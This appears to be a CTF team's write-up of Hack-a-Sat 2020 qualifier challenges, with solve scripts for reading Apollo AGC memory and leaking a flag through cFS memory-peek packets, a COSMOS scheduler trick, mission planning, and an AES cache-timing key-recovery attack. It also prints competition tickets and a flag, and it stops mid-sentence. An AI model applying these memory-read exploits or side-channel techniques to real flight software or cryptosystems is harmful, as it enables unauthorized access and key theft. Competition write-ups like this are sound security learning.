Hack-a-Sat Quals 2020


In late May, our team played in the Hack-a-Sat Qualifiers and placed 7th, qualifying for the final event. Hack-a-Sat is a new CTF centered around satellite technology hacking, including both software and hardware. We didn’t know a whole lot about satellites, but we managed to play hard and have a good time. Here are some writeups for a few of the most interesting challenges we worked on.

1201 Alarm

mincerino, nafod

Description

Step right up, here’s one pulled straight from the history books. See if you can DSKY your way through this challenge! (Thank goodness VirtualAGC is a thing)

Ticket: Present this ticket when connecting to the challenge: [redacted]. Don’t share your ticket with other teams.

Connecting: Connect to the challenge on apollo.satellitesabove.me:5024. Using netcat, you might run

nc apollo.satellitesabove.me 5024

There was no download provided, just the host:port and the VirtualAGC hint:

$ echo <ticket> | nc apollo.satellitesabove.me 5024

...

The rope memory in the Apollo Guidance Computer experienced an unintended 'tangle' just
prior to launch. While Buzz Aldrin was messing around with the docking radar and making Neil
nervous; he noticed the value of PI was slightly off but wasnt exactly sure by how much. It
seems that it was changed to something slightly off 3.14 although still 3 point something.
The Commanche055 software on the AGC stored the value of PI under the name "PI/16", and
although it has always been stored in a list of constants, the exact number of constants in
that memory region has changed with time.

Help Buzz tell ground control the floating point value PI by connecting your DSKY to the
AGC Commanche055 instance that is listening at 3.22.223.17:18406

What is the floating point value of PI?:

Yes, we did try 3.14…who knows.

Anyways, we connected to the next service at 3.22.223.17:18406

$ nc 3.22.223.17 18406

<...bunch of binary data streaming in>



At this point, it was clear we needed to know more about VirtualAGC, Comanche055, the DSKY, and the Apollo Guidance Computer (presumably what AGC refers to). I cloned the GitHub repo (https://github.com/virtualagc/virtualagc) and noticed a folder titled Comanche055. After some quick googling, I figured this folder held most of the code we would care about. I tried to build everything on Linux, and it didn’t work. (During a CTF, if a build fails the first time, I normally look for any alternative and only come back to fix build issues if I absolutely need to.) I saw someone had made a port called moonjs, but it doesn’t support the Comanche055 software. I eventually found a prebuilt version for Windows (http://apollo.josefsipek.net/download.html). My host is Windows, so I just grabbed it, and thankfully something resembling a simulator popped up. I also noticed a calculator-like thing pop up when I tried to run the Apollo 11 mission.

Comanche055 is what was run for the Apollo 11 mission (again, thanks Google), so I figured the server was running VirtualAGC with Comanche055. My terminal showed ..\bin\yaDSKY2.exe running, so I finally remembered to look up what the DSKY is, and it turns out… it is the calculator thing. Going through the VirtualAGC docs, I noticed the DSKY binary can take an IP and port as arguments. By this point I had also learned that the DSKY is the interface for some basic programming of the AGC.

Connect with dsky to the 2nd service and try things???

> ..\bin\yaDSKY2.exe --ip=<ip> --port=<port>

We tried a whole bunch of commands (verbs)

- 00

- 31

- 01

and some random assortment of nouns with them, while we searched Google and the source for how to do anything meaningful.

Eventually it got annoying to manually connect to the first service and copy out the IP and port, so we scripted it:

from pwn import *
import subprocess
from IPython import embed

ticket = "ticket{...}"
host, port = "apollo.satellitesabove.me", 5024

def go(debug=False):
    r = remote(host, port)
    r.recvuntil(b'please:')
    r.sendline(ticket.encode())
    r.recvuntil(b'listening at ')
    # e.g. "3.22.223.17:18406" -> ("3.22.223.17", "18406")
    agc_host, agc_port = r.recvline().strip().decode().split(':')
    print("connect to", agc_host, agc_port)

    # run from a symlink to /mnt/c/Program Files (x86)/Virtual AGC/Resources/ (WSL path)
    # launch DSKY2 and connect it to the AGC server
    args = ["../bin/yaDSKY2.exe", "--ip=" + agc_host, "--port=" + agc_port]
    if debug:
        args.append("--debug-counter-mode")  # debug mode
    subprocess.Popen(args, cwd="./agc_loc")
    return r

r = go()
embed()  # poke at the connection from IPython
#r.interactive()

DSKY and AGC Architecture

The first thing we learned was that almost every number, both on the DSKY display and throughout the source, was in octal. Next, we learned that the DSKY can take input beyond just the verb and noun, for example when we want to read a fixed memory address (again, input in octal).

The command we settled on as the winner, once we figured out how to address memory, was VERB 27 with NOUN 02. At first we didn’t know exactly how to address fixed memory, since the AGC uses memory banks.

After digging through the source for a while, we had ideas for constants near PI that would be easy to identify, like `37777 37700 LIM(-22)`.

But we still weren’t sure where in memory they would be. Then my teammate found Comanche055/MAIN.agc.html in the installed source, which had a symbol table like:

004393: PHSNAME5 E3,1446   004394: PHSNAME6 E3,1450   004395: PHSPART2 01,3755   004396: PHSPRDT1 1054
004397: PHSPRDT2 1056      004398: PHSPRDT3 1060      004399: PHSPRDT4 1062      004400: PHSPRDT5 1064
004401: PHSPRDT6 1066      004402: PI/16 27,3355      004403: PI/4.0 23,3102     004404: PIC1 14,2370
004405: PIC2 14,2373       004406: PIC3 14,2402       004407: PIC4 14,2405       004408: PICAPAR 14,2333

We assumed the first number was the bank and the second was the offset into the bank. Just above the symbol table was a list of banks that went at least up to 27, so we took that as confirmation. We also assumed that each bank was 2000 (octal) words, regardless of how many were used.

Usage Table for Fixed-Memory Banks

Bank 00: 1770/2000 words used.
Bank 01: 1770/2000 words used.
Bank 02: 1773/2000 words used.
Bank 03: 1775/2000 words used.
...

We basically went through a few files, starting from bank 0 and going up to what we thought was bank 27, to verify that we were reading memory correctly, using guess-and-check math like:

oct(0o2000*27 + 0o3355)

Verb: *27* Noun: *02*

input: *071355*



Things looked off that high up when we tried to find our PI, so we just kept subtracting full bank widths and checking other symbols against what we saw in memory. Eventually, we saw our beacon of hope: 37700. We were so excited. It was clear from the source that we had to read PI/16 in two parts, and that it would be in some octal form: ` 06220 37553 PI/16 2DEC 3.141592653 B-4`.

We read out both values, and my teammate nafod did some math gymnastics in a Python console and in his head to figure out the relevant sign and precision bits (see also: https://www.ibiblio.org/apollo/assembly_language_manual.html#Data_Representation).

Submit PI, rounded to the same number of decimal places as the PI/16 constant, and get the flag.
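We did not verify this during the CTF, but one possible explanation for the overshoot rests on two assumptions. First, the bank numbers in the yaYUL symbol table are octal, so bank `27` is 23 decimal. Second, a banked offset such as `3355` is an address inside the fixed-switchable window 2000–3777 (octal), not an offset from the start of the bank. The sketch below applies both through a hypothetical helper, `fixed_pseudo_address`, and compares the result with our first guess (071355):

```python
# Sketch only: assumes (1) bank numbers in the yaYUL symbol table are octal and
# (2) banked offsets such as 3355 are addresses in the fixed-switchable
# window 2000-3777 (octal), not offsets from the start of the bank.
BANK_WORDS = 0o2000        # 1024 words per fixed-memory bank
SWITCHED_BASE = 0o2000     # first address of the fixed-switchable window (assumed)


def fixed_pseudo_address(bank: str, offset: str) -> str:
    """Hypothetical helper: map a listing entry like '27,3355' to a flat octal address."""
    bank_num = int(bank, 8)      # treat the bank number as octal
    addr = int(offset, 8)
    if not SWITCHED_BASE <= addr < SWITCHED_BASE + BANK_WORDS:
        raise ValueError("offset is outside the assumed 2000-3777 window")
    return format(bank_num * BANK_WORDS + (addr - SWITCHED_BASE), "05o")


# Our original guess: bank 27 read as decimal, offset added as-is.
first_guess = format(0o2000 * 27 + 0o3355, "05o")
pi_guess = fixed_pseudo_address("27", "3355")
banks_apart = (int(first_guess, 8) - int(pi_guess, 8)) // BANK_WORDS
print(first_guess, pi_guess, banks_apart)   # 71355 57355 5
```

If both assumptions hold, PI/16 would sit exactly five bank widths below the first address we tried. That would fit with subtracting whole banks eventually working.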
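For reference, here is a minimal decoder for the AGC double-precision format as we understand it from the Data Representation section linked above:

- Each 15-bit word is ones' complement: a sign bit plus 14 magnitude bits.
- The pair of words forms a 28-bit fraction.
- A `B-4` scale factor means the stored fraction is the true value divided by 2^4.

The function names are our own. Feeding in the two words from the listing should recover the untampered constant. The two words read off the DSKY go in the same way.

```python
def ones_complement_15(word: int) -> int:
    """Interpret a 15-bit AGC word as a signed ones'-complement integer."""
    word &= 0o77777
    if word & 0o40000:                 # sign bit set: negative
        return -(word ^ 0o77777)       # magnitude is the bitwise inverse
    return word


def agc_2dec(hi: int, lo: int, scale_exp: int) -> float:
    """Decode a 2DEC word pair scaled by B-<scale_exp> back to a float."""
    # The high word carries bits 2^-1..2^-14, the low word 2^-15..2^-28.
    fraction = ones_complement_15(hi) / 2**14 + ones_complement_15(lo) / 2**28
    return fraction * 2**scale_exp


# Words from the listing: 06220 37553 PI/16 2DEC 3.141592653 B-4
print(agc_2dec(0o06220, 0o37553, 4))   # ≈ 3.1415927
```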

Bytes Away!

bac0nbitz, antistacks

The function KIT_TO_SendFlagPkt reads the flag from an environment variable named ‘FLAG’ and copies it into the global variable KitToFlagPkt, at offset 0x18C80 from KitTo. To leak it, send the COSMOS command MM PEEK_MEM with ADDR_SYMBOL_NAME ‘KitTo’ plus offset 0x18C80 (KitToFlagPkt) repeatedly, reading the flag 4 bytes at a time starting from offset 0 until the end of the flag.

// Decompiled KIT_TO_SendFlagPkt:
void KIT_TO_SendFlagPkt(void) {
    char *flag;

    flag = getenv("FLAG");
    if (flag == (char *)0x0) {
        flag =
            "{defaultdefaultdefaultdefaultdefaultdefaultdefaultdefaultdefaultdefaultdefaultdefaultdefaultdefaultdefaultdefaultdefaultdefaultdefaultdefaultdefaultdefaultdefault}";
    }
    memset(KitToFlagPkt.Flag, 0, 200);
    strncpy(KitToFlagPkt.Flag, flag, 200);
    CFE_SB_TimeStampMsg(&KitToFlagPkt);
    CFE_SB_SendMsg(&KitToFlagPkt);
    return;
}

solve

from pwn import *
import binascii

ru = lambda x : p.recvuntil(x)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)

def send_lookup_symbol(p, t):
    # MM lookup-symbol command for "KitTo", 72 bytes in total:
    # 00000000 18 88 c0 00 00 41 09 8a 4b 69 74 54 6f 00 00 00
    # 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    # ...
    # 00000040 00 00 00 00 00 00 00 00
    pkt = binascii.unhexlify('1888c0000041098a') + b'KitTo'.ljust(64, b'\x00')
    t.send(pkt)
    ru(b'Addr = ')
    addr = int(p.recvline().strip(), 16)
    print('address is %s' % addr)
    return addr

def peek_flag_data(p, t, addr, offset):
    # MM peek command at an absolute address, 80 bytes in total:
    # 00000000 18 88 c0 00 00 49 02 a2 08 01 00 00 91 6a 40 f4
    # 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    # ...
    # 00000050
    pkt = (binascii.unhexlify('1888c000004902a208010000')
           + p32(addr + offset)
           + b'\x00' * 64)
    t.send(pkt)
    print(ru(b'Data = 0x'))
    return p.recvline().strip().decode('utf-8')

context.log_level = 'debug'

p = remote('bytes.satellitesabove.me', 5042)
ru(b"please:")
sl(b'ticket{india82753golf:GFzaYxtqzMC-gJV_dBlgUTN5aEr_aY6YraaO07_IYQW8DLJYbOyAzJfgqpocbXCoSw}')
ru(b"tcp:")
ip, port = rl().strip().decode().split(':')
port = int(port)
print("%s : %s" % (ip, port))
ru(b"OPERATIONAL")

rem = remote(ip, port)
addr = send_lookup_symbol(p, rem)

flag = ''
# KitToFlagPkt.Flag is 200 (0xc8) bytes; +12 presumably skips the telemetry header
for i in range(0xc8):
    flag += peek_flag_data(p, rem, addr + (0x18c80 - 0x6200) + 12, i)
print(flag)
print(binascii.unhexlify(flag))
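The two hand-written packets appear to follow the usual cFS command layout:

- A 6-byte CCSDS primary header, whose length field is the total packet length minus 7.
- A function-code byte.
- A checksum byte.

The hypothetical helper `ccsds_cmd` below rebuilds both packets. The checksum rule it uses is our assumption: pick the byte so that the XOR of every byte in the packet is 0xFF. It does reproduce both headers shown in the script's hexdump comments. The field names in the peek payload (DATA_SIZE, MEM_TYPE) are our reading of the MM layout.

```python
import struct
from functools import reduce


def ccsds_cmd(stream_id: int, func_code: int, payload: bytes, seq: int = 0xC000) -> bytes:
    """Build a cFS-style command packet (sketch; checksum convention assumed)."""
    # Primary header: stream ID, sequence flags/count, length = total bytes - 7.
    total_len = 6 + 2 + len(payload)
    header = struct.pack(">HHH", stream_id, seq, total_len - 7)
    # Checksum chosen so that the XOR over the whole packet equals 0xFF.
    xor_rest = reduce(lambda acc, b: acc ^ b, header + bytes([func_code]) + payload, 0)
    checksum = xor_rest ^ 0xFF
    return header + bytes([func_code, checksum]) + payload


# MM lookup-symbol: the symbol name padded to 64 bytes.
lookup = ccsds_cmd(0x1888, 0x09, b"KitTo".ljust(64, b"\x00"))
# MM peek: DATA_SIZE 0x08, MEM_TYPE 0x01, 2 padding bytes, little-endian address,
# then an empty 64-byte symbol name (address taken from the hexdump comment).
peek = ccsds_cmd(0x1888, 0x02, b"\x08\x01\x00\x00" + struct.pack("<I", 0xF4406A91) + b"\x00" * 64)
print(lookup[:16].hex(), len(lookup))
print(peek[:16].hex(), len(peek))
```

If this convention is right, the solve loop reuses a checksum byte (0xa2) that only matches one address. That suggests the target did not enforce command checksums; the COSMOS command in the next writeup also goes through with CCSDS_CHECKSUM 0.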

That’s not on my calendar

numbers

This challenge was the first in the Payload Modules category. This category ultimately proved to be a mix of reverse engineering challenges with a focus on protocols and real satellite software. Multiple hints were released for this challenge, and they may have been necessary to solve it.



This challenge is an introduction to COSMOS and [CFS (https://cfs.gsfc.nasa.gov/). After running the setup and launcher, we see the following GUI:

The primary difficulty in this challenge came from unfamiliarity with general COSMOS and cFS concepts. Initially I spent a while just poking around the GUI. Eventually they put out a hint that “the udp forwarder will provide it to you as TCP from there” which made me realize that the connection being provided by the server infrastructure was forwarded UDP traffic from a simulator. At this point I wrote a small script to forward the server to my COSMOS instance. It would probably have been easy to change the config, but this saved time since I would not need to change the config every time I wanted to poke at the server. Also, I could leave the GUI running and just restart the script, as COSMOS continuously tries to connect.

from pwn import *

context.log_level = 'debug'

# wait for COSMOS to connect to us locally
l = listen(54321)
local = l.wait_for_connection()

t = "ticket{delta41798romeo:GJpU7nOSGVpkjaR7fK5W2ydEhicUel_ajeICtB4mW2QjDsMzHsDHACLLr2VHP_yUxw}"
r = remote("calendar.satellitesabove.me", 5061)
r.sendline(t.encode())
r.recvuntil(b"tcp:")
fwd_host, fwd_port = r.recvline().strip().decode().split(":")
rem = remote(fwd_host, int(fwd_port))

# shuttle traffic in both directions between COSMOS and the challenge
local.connect_both(rem)
r.stream()

By looking at the Command Sender in the GUI, we can see much of the functionality supported by the cFS endpoint. Eventually, while looking through every available command in the GUI, I found the command to enable telemetry:

cmd("KIT_TO ENABLE_TELEMETRY with CCSDS_STREAMID 6272, CCSDS_SEQUENCE 49152, CCSDS_LENGTH 17, CCSDS_FUNCCODE 7, CCSDS_CHECKSUM 0, IP_ADDR '127.0.0.1'")

Fortunately, once a command is sent with the GUI, we can copy-paste it from the command log, and don’t need to use the GUI to send it in the future.

This command caused the cFS endpoint to begin sending telemetry, but it wasn’t sending the flag.

cFS seems to use JSON tables to define much of its functionality. I am not actually 100% clear on this, and I made many assumptions while solving the challenge. The organizers released a hint which included several KIT tables:

- cpu1_kit_to_pkt_tbl.json

- cpu1_kit_sch_sch_tbl.json

- cpu1_kit_sch_msg_tbl.json

Between the hint JSON for the KIT_SCH tables and the challenge name, I figured it was necessary to somehow schedule the flag packet to be sent. I continued looking through every command in COSMOS for one that modifies the scheduler, and found the KIT_SCH command “LOAD_SCH_ENTRY”. I made some assumptions about its functionality based on the hint JSON. Looking at the telemetry and the hint JSON, I guessed that scheduler slot 0, index 0 was active, since I was receiving ES and EVS housekeeping packets. KIT_TO_SEND_FLAG_MID is at index 42 in the message table, so I sent the following command:

cmd("KIT_SCH LOAD_SCH_ENTRY with CCSDS_STREAMID 6293, CCSDS_SEQUENCE 49152, CCSDS_LENGTH 13, CCSDS_FUNCCODE 5, CCSDS_CHECKSUM 0, SLOT 0, ACTIVITY 0, CONFIG 1, FREQ 1, OFFSET 0, MSG_TBL_IDX 42")

The flag was returned in telemetry and viewed via the GUI.

Good Plan? Great Plan!

medarkus, nafod

Help the Launchdotcom team perform a mission on their satellite to take a picture of a specific location on the ground. No hacking here, just good old fashion mission planning!

Connect to the challenge on mission.satellitesabove.me:5023. Using netcat, you might run

nc mission.satellitesabove.me 5023

On connection to the service, we’re presented with the following instructions:

##########################

Mission Planning Challenge

##########################

The current time is April 22, 2020 at midnight (2020-04-22T00:00:00Z).

We need to obtain images of the Iranian space port (35.234722 N 53.920833 E) with our satellite within the next 48 hours.

You must design a mission plan that obtains the images and downloads them within the time frame without causing any system failures on the spacecraft, or putting it at risk of continuing operations.

The spacecraft in question is USA 224 in the NORAD database with the following TLE:

1 37348U 11002A 20053.50800700 .00010600 00000-0 95354-4 0 09

2 37348 97.9000 166.7120 0540467 271.5258 235.8003 14.76330431 04

The TLE and all locations are already known by the simulator, and are provided for your information only.

Requirements

############

You need to obtain 120 MB of image data of the target location and downlink it to our ground station in Fairbanks, AK (64.977488 N 147.510697 W).

Your mission will begin at 2020-04-22T00:00:00Z and last 48 hours.

You are submitting a mission plan to a simulator that will ensure the mission plan will not put the spacecraft at risk, and will accomplish the desired objectives.

Mission Plan

############

Enter the mission plan into the interface, where each line corresponds to an entry.

You can copy/paste multiple lines at once into the interface.

The simulation runs once per minute, so all entries must have 00 for the seconds field.

Each line must be a timestamp followed by the mode with the format:

2020-04-22T00:00:00Z sun_point

YYYY-MM-DDThh:mm:00Z next_mode

...

The mission will run for it's full duration, regardless of when the image data if obtained.

You must ensure the bus survives the entire duration.

Mode Information

################

The bus has 4 possible modes:

- sun_point: Charges the batteries by pointing the panels at the sun.

- imaging: Trains the imager on the target location and begins capturing image data.

- data_downlink: Slews the spacecraft to point it's high bandwidth downlink transmitter at the ground station and transmits data to the station.

- wheel_desaturate: Desaturates the spacecraft reaction wheels using the on board magnetorquers.

Each mode dictates the entire state of the spacecraft.

The required inputs for each mode are already known by the mission planner.

Bus Information

###############

The onboard computer has 95 MB of storage.

All bus components are rated to operate effectively between 0 and 60 degrees Celsius.

The battery cannot fall below 10% capacity, or it will reduce the life of the spacecraft.

The reaction wheels have a maximum speed of 7000 RPM.

You will received telemetry from the spacecraft throughout the simulated mission duration.

You will need to monitor this telemetry to derive the behavior of each mode.

########################################################################

Please input mission plan in order by time.

Each line must be a timestamp followed by the mode with the format:

YYYY-MM-DDThh:mm:ssZ new_mode

Usage:

run -- Starts simulation

plan -- Lists current plan entries

exit -- Exits

Once your plan is executed, it will not be saved, so make note of your plan elsewhere.

We know the following:

- We have 4 possible modes that dictate the state of the spacecraft
- The challenge gives us the coordinates of the space port (imaging target) and the ground station (downlink target)
- We only have 95 MB of storage, but we have to capture and downlink 120 MB of image data (this means we have to make at least 2 passes, downlinking in between)
- We have to monitor the telemetry and be careful not to let our components overheat or the reaction wheels spin too fast

If we try to take an image of the space port at the wrong time, we receive the following error:

Collected Data: 0 bytes

2020-04-23T00:03:00Z

Changing mode to: imaging

{'batt': {'percent': 91.4, 'temp': 29.300000000000036}, 'panels': {'illuminated': True}, 'comms': {'pwr': False, 'temp': 23.100000000000698}, 'obc': {'disk': 10, 'temp': 28.300000000000036}, 'adcs': {'mode': 'target_track', 'temp': 28.300000000000036, 'whl_rpm': [4673.178354093624, 4776.195651001402, 4810.625994904977], 'mag_pwr': [False, False, False]}, 'cam': {'pwr': True, 'temp': 28.100000000000698}}

Collected Data: 0 bytes

Mission Failed. ERROR: Target not in view. Cannot image.

[*] Got EOF while reading in interactive

This confirms that we cannot take our image until our spacecraft can actually see the Iranian space port. Fortunately, thanks to tooling PFS wrote for an earlier challenge, we were able to enumerate a list of timestamps of when our spacecraft would most likely have the target in its view.
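PFS's tooling isn't reproduced here. The core test behind any such window search is whether the satellite sits above the target's local horizon. Below is a minimal sketch of that test. It assumes a spherical Earth and Earth-fixed satellite positions in km from an orbit propagator, which is not shown. The function names are ours, and the simulator's real "in view" rule is unknown to us.

```python
import math

EARTH_RADIUS_KM = 6371.0  # mean radius; the whole sketch assumes a spherical Earth


def latlon_to_ecef(lat_deg: float, lon_deg: float, alt_km: float = 0.0) -> tuple:
    """Earth-fixed (x, y, z) in km for a point on or above a spherical Earth."""
    lat, lon = math.radians(lat_deg), math.radians(lon_deg)
    r = EARTH_RADIUS_KM + alt_km
    return (r * math.cos(lat) * math.cos(lon),
            r * math.cos(lat) * math.sin(lon),
            r * math.sin(lat))


def elevation_deg(site_lat: float, site_lon: float, sat_ecef: tuple) -> float:
    """Elevation of the satellite above the site's local horizon, in degrees."""
    site = latlon_to_ecef(site_lat, site_lon)
    rel = [s - o for s, o in zip(sat_ecef, site)]
    up = [c / EARTH_RADIUS_KM for c in site]      # local vertical on a sphere
    dist = math.sqrt(sum(c * c for c in rel))
    sin_el = sum(a * b for a, b in zip(rel, up)) / dist
    return math.degrees(math.asin(max(-1.0, min(1.0, sin_el))))


# Example: a satellite 500 km straight above the space port is at about 90 degrees.
spaceport = (35.234722, 53.920833)
print(round(elevation_deg(*spaceport, latlon_to_ecef(*spaceport, 500.0)), 3))
```

Stepping `elevation_deg` over propagated positions at one-minute intervals (the simulator's resolution) and keeping the minutes above some minimum elevation gives candidate windows. This works for both imaging and downlink.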

After some trial and error, we were able to capture some data, but quickly realized you only have so many “ticks” to capture and upload data before the targets left the view of our spacecraft.

From here on out, the challenge is basically more trial and error. Players will most likely encounter errors from either the camera overheating or the reaction wheels spinning faster than 7000 RPM, which causes the mission to fail. If the mission fails, pay close attention to the timestamp of the last telemetry error message.
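The simulator prints each telemetry line as a Python dict literal (as in the error output above), so it is easy to check mechanically while iterating. Below is a sketch of such a check against the limits the challenge states:

- 0–60 °C for bus components
- battery at or above 10%
- wheels below 7000 RPM

The helper name is our own, and the list of components checked is taken from that one sample line.

```python
import ast


def telemetry_warnings(line: str) -> list:
    """Return human-readable limit violations for one telemetry line."""
    tlm = ast.literal_eval(line)            # the simulator prints a dict literal
    warnings = []
    for part in ("batt", "comms", "obc", "adcs", "cam"):
        temp = tlm[part]["temp"]
        if not 0 <= temp <= 60:
            warnings.append(f"{part} temperature {temp:.1f} C")
    if tlm["batt"]["percent"] < 10:
        warnings.append(f"battery at {tlm['batt']['percent']}%")
    for idx, rpm in enumerate(tlm["adcs"]["whl_rpm"]):
        if abs(rpm) >= 7000:
            warnings.append(f"wheel {idx} at {rpm:.0f} RPM")
    return warnings
```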

Solve Script

#!/usr/bin/env python3
from pwn import *

context.log_level = 'debug'

# modes
SUN_POINT = 'sun_point'
IMAGING = 'imaging'
DATA_DOWNLINK = 'data_downlink'
WHEEL_DESATURATE = 'wheel_desaturate'
RUN = 'run'

def construct_plan(timestamp, mode):
    return f'{timestamp} {mode}'

host1 = 'mission.satellitesabove.me'
port1 = 5023
ticket = 'ticket{YOUR_TEAM_TICKET_HERE}'

p = remote(host1, port1)
p.recvuntil('Ticket please:\n')
p.sendline(ticket)
p.recvuntil('Once your plan is executed, it will not be saved, so make note of your plan elsewhere.\n')

p.sendline(construct_plan('2020-04-22T00:00:00Z', SUN_POINT))
p.sendline(construct_plan('2020-04-22T09:31:00Z', IMAGING))
p.sendline(construct_plan('2020-04-22T09:37:00Z', WHEEL_DESATURATE))
p.sendline(construct_plan('2020-04-22T10:00:00Z', SUN_POINT))
p.sendline(construct_plan('2020-04-23T00:00:00Z', DATA_DOWNLINK))
p.sendline(construct_plan('2020-04-23T00:05:00Z', SUN_POINT))
p.sendline(construct_plan('2020-04-23T09:51:00Z', IMAGING))
p.sendline(construct_plan('2020-04-23T09:58:00Z', WHEEL_DESATURATE))
p.sendline(construct_plan('2020-04-23T09:59:00Z', SUN_POINT))
p.sendline(construct_plan('2020-04-23T13:33:00Z', WHEEL_DESATURATE))
p.sendline(construct_plan('2020-04-23T18:40:00Z', SUN_POINT))
p.sendline(construct_plan('2020-04-23T22:46:00Z', DATA_DOWNLINK))
p.sendline(construct_plan('2020-04-23T22:51:00Z', SUN_POINT))
p.sendline(RUN)

p.interactive()
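Every rejected plan costs a full simulation run. A quick local check against the formatting rules the server lists is cheap insurance:

- timestamps with 00 seconds
- one of the four modes
- entries in time order
- everything inside the 48-hour mission

Below is a sketch of such a check. `validate_plan` is our own helper, not part of the challenge, and it only checks format, not spacecraft safety.

```python
from datetime import datetime, timedelta

MODES = {"sun_point", "imaging", "data_downlink", "wheel_desaturate"}
START = datetime(2020, 4, 22)
END = START + timedelta(hours=48)


def validate_plan(lines):
    """Return a list of problems with a plan (an empty list means it looks OK)."""
    problems = []
    previous = None
    for n, line in enumerate(lines, 1):
        try:
            stamp, mode = line.split()
            when = datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ")
        except ValueError:
            problems.append(f"line {n}: cannot parse {line!r}")
            continue
        if when.second != 0:
            problems.append(f"line {n}: seconds must be 00")
        if mode not in MODES:
            problems.append(f"line {n}: unknown mode {mode!r}")
        if not START <= when < END:
            problems.append(f"line {n}: outside the 48-hour mission")
        if previous is not None and when <= previous:
            problems.append(f"line {n}: not in time order")
        previous = when
    return problems
```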

Flag

MISSION SUCCESS!!!


flag{quebec17372quebec:GGbkuxdQxne72Bis_qr5OEP0mSaKXj5Jg3cwI2eTkyBl8Lc_VzgYXu5FanKZ6FWWFBUbvw1-xQ5JWPlcBfEXGkQ}

Leaky Crypto

oneup, inukai, antistacks

We’re given:

- an encrypted message

- the first 48 bits of an AES-128 key

- the timing data from encrypting 100,000 hashes

It pretty much came down to implementing the attack from this paper.

The theory is that a table-based AES implementation uses four lookup tables in every round. 4 bytes of the round state are used as indices into the first table, 4 into the second, and so on. All else being equal, this should be a constant-time algorithm that leaks no information via timing. There is no branching dependent on the data being encrypted, and table lookups should take the same time regardless of the index.

In reality, though, the table lookup time will be significantly different depending on whether the memory holding the table entry is already in the processor’s cache. If there’s a cache hit, the lookup will be faster; if there’s a cache miss, the lookup will be slower. As a result, we can observe the time taken and learn whether there were cache hits.

Before we continue, there’s one more detail about the cache we need to examine. When the processor caches values from memory, it doesn’t just cache single bytes or even dwords. It fills a cacheline with anywhere from 16 to 64 contiguous bytes of memory, depending on the processor model. This matters because a cache hit doesn’t mean the two table indices were exactly the same. One value could have been in one part of the cacheline and the other value in a different part. For simplicity’s sake, we won’t be rigorous about the lower bits in the explanation below, because they really complicate it. The only practical effect is that we have to mask off the lower bits in some places. As a result, we don’t reduce the key entropy by quite as many bits as we’d like, but it still gets low enough to be brute-forceable.

So what precisely does a cache hit tell us? It tells us that two bytes from the round that use the same lookup table had very similar indices into the table, and therefore were almost the same value. But what does it tell us if two bytes in some unknown round were almost the same? It depends a lot on which round the collision occurred in. Theoretically, as you get to later and later rounds, the data should become more and more randomly distributed. As a result, the number of cache hits in later rounds should be mostly independent of the original plaintext.

However, the first round is extremely dependent on the plaintext as the bytes for the first round are just the plaintext XORed with the key. So the theory is that we should be able to correlate the cache hits to the values used for the first round. And since we know the plaintext, we can use the values from the first round to derive bits from the key.

I believe this is where the theory departs from reality a little bit, or at least the actual challenge we were given to solve. While there will certainly be some correlation there, the random cache hits that occur in later rounds should result in quite a bit of noise in the data. However, the data we were given was very, very clean.

So moving forward, we’ll assume that every cache hit is caused by a collision in the first round. This certainly wouldn’t hold in a real-world attack, but it seems to be true of the data we were given for this challenge.

So let’s look at how the indices for the first round are generated. Let $p_i$ be the $i$-th plaintext byte, and $k_i$ be the $i$-th key byte. Then the lookup index for the $i$-th byte, $n_i$, is equal to

$$n_i = p_i \oplus k_i$$

If the lookup indices for the $i$-th and $j$-th bytes are the same, then we know

$$n_i = n_j$$

which means

$$p_i \oplus k_i = p_j \oplus k_j$$

Rearranging, we get

$$k_i = k_j \oplus p_i \oplus p_j$$

Since we know the plaintext, this means we can derive additional bits of the key in k_i if we already know some bits for some k_j. Conveniently, we start with the first 48 bits of the 128-bit key.

We start by determining which bytes use which lookup tables. We can separate the bytes into four families which each use the same lookup:

- Bytes 0, 4, 8, and 12 use the first lookup table

- Bytes 5, 9, 13, and 1 use the second lookup table

- Bytes 10, 14, 2, and 6 use the third lookup table

- Bytes 15, 3, 7, and 11 use the fourth lookup table

So we iterate through all 100,000 plaintexts and times, building a set of tables as we go. For each pair of bytes, we can make 256 sets of data points, each set corresponding to one possible result of XOR-ing the two bytes together, collecting the timings for every time they XOR-ed to that result. We start with 256 possible values of the result of the XOR; however, we also have to take the cachelines into account. Since the cachelines are large enough to hold multiple entries, when there is a cache hit all we know is that both entries were in the same cacheline. As a result, we mask off some of the lower bits of the XOR result, since those bits are indistinguishable. No matter the value of the lower bits, they still end up in the same cacheline.

We determined the number of bits to mask empirically, by experimenting and keeping whatever gave the best results. We wanted to mask the fewest bits possible while still getting a clear result. Masking the lower 2 bits gave the best result. That corresponds to a 16-byte cacheline: 2 bits give 4 possible indices, each mapping to a 4-byte table entry.

From there, we find the XOR value with the lowest average time for each pair. The original paper uses a t-test for this, which makes the result more rigorous and would allow the analysis to be automated. However, since there were so few pairs, and we didn’t care about rigor, we just eyeballed the results for each pair. Only one result for each pair had what appeared to be a significantly lower timing.

This all worked pretty well up to this point. However, for some unknown reason, the last byte in each family didn’t seem to work very well. No matter what its XOR result with another byte from the same family was, the average timing was exactly the same across the board. After some experimenting, we found that these bytes did pair with a byte from the next family. They gave a clean result when tested against the first byte of the next lookup table. However, we never found a good pair for the last byte of the last lookup table, byte 11.
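The bucketing step can be sketched as follows. This simplifies what we did and is not the paper's method: it uses a plain mean instead of a t-test, and masks the low 2 bits of each byte (`& ~0x3`, i.e. `& 0xFC` within a byte). Under the first-round collision model above, the masked plaintext XOR with the lowest mean time estimates `(k_i ^ k_j) & ~0x3`. The helper `best_xor` and the sample format, a list of `(plaintext, time)` pairs, are assumptions for illustration.

```python
from collections import defaultdict
from statistics import mean

MASK = 0xFC  # ~0x3 within one byte: the 2 low index bits share a cache line


def best_xor(samples, i, j, mask=MASK):
    """Return the masked p_i ^ p_j value whose encryptions were fastest on average.

    samples: iterable of (plaintext: bytes, timing: float) pairs.
    """
    buckets = defaultdict(list)
    for plaintext, timing in samples:
        buckets[(plaintext[i] ^ plaintext[j]) & mask].append(timing)
    return min(buckets, key=lambda value: mean(buckets[value]))
```

With real data, `best_xor(samples, 4, 8)` would be one line in the list of relationships below.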

We were able to determine the following relationships:

